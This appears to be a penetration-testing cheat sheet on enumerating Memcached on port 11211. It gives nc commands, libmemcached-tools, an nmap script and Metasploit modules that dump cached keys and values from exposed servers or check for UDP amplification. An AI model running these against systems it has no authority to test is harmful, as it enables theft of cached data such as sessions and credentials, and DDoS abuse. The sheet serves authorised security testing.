11211 - PHPMemCached
Memcached is a general-purpose distributed memory caching system. It is often used to speed up dynamic database-driven websites by caching data and objects in RAM to reduce the number of times an external data source (such as a database or API) must be read.

Memcached Port

Port: 11211/tcp open

Dir list

1
/memcachedadmin/stats.php
2
/memcachedadmin/Temp/.version
3
/memcachedadmin/configure.php
4
/memcachedadmin/index.php?server=127.0.0.1:11211
5
/memcachedadmin/index.php?server=127.0.0.1:11211&show=slabs
6
/memcachedadmin/commands.php
Copied!
1
echo "version" | nc -vn -w 1 <IP> 11211 #Get version
2
echo "stats" | nc -vn -w 1 <IP> 11211 #Get status
3
echo "stats slabs" | nc -vn -w 1 <IP> 11211 #Get slabs
4
echo "stats items" | nc -vn -w 1 <IP> 11211 #Get items of slabs with info
5
echo "stats cachedump <number> 0" | nc -vn -w 1 <IP> 11211 #Get key names (the 0 is for unlimited output size)
6
echo "get <item_name>" | nc -vn -w 1 <IP> 11211 #Get saved info
7
8
#This php will just dump the keys, you need to use "get <item_name> later"
9
sudo apt-get install php-memcached
10
php -r '$c = new Memcached(); $c->addServer("localhost", 11211); var_dump( $c->getAllKeys() );'
Copied!

Using libmemcached-tools

1
sudo apt install libmemcached-tools
2
memcstat --servers=127.0.0.1 #Get stats
3
memcdump --servers=127.0.0.1 #Get all items
4
memccat --servers=127.0.0.1 <item1> <item2> <item3> #Get info inside the item(s
Copied!

Automatic scripts

1
nmap -n -sV --script memcached-info -p 11211 <IP> #Just gather info
2
msf > use auxiliary/gather/memcached_extractor #Extracts saved data
3
msf > use auxiliary/scanner/memcached/memcached_amp #Check is UDP DDoS amplification attack is possible
Copied!

CVEs

Any input is vulnerable to XSS.

References

Last modified 5mo ago